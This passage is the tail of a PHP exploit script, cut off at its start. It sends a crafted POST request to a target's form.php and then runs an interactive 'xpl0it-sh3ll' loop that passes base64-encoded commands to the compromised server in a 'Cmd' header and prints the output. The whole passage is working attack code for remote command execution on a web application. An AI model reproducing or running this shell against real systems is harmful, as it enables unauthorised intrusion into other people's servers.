{$data[header]} "); $packet = "POST {$path}form.php HTTP/1.1\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: ".strlen($data)."\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Keep-Alive: 300\r\n"; $packet .= "Connection: keep-alive\r\n\r\n"; $packet .= $data; http_send($host, $packet); // ...and start the shell! define(STDIN, fopen("php://stdin", "r")); while(1) { print "\nxpl0it-sh3ll > "; $cmd = trim(fgets(STDIN)); if ($cmd != "exit") { $packet = "GET {$path} HTTP/1.1\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: ".base64_encode($cmd)."\r\n"; $packet .= "Keep-Alive: 300\r\n"; $packet .= "Connection: keep-alive\r\n\r\n"; $resp = http_send($host, $packet); if (!strpos($resp, "__")) die("\n[-] Exploit failed...\n"); $shell = explode("__", $resp); print "\n".$shell[1]; } else break; } ?>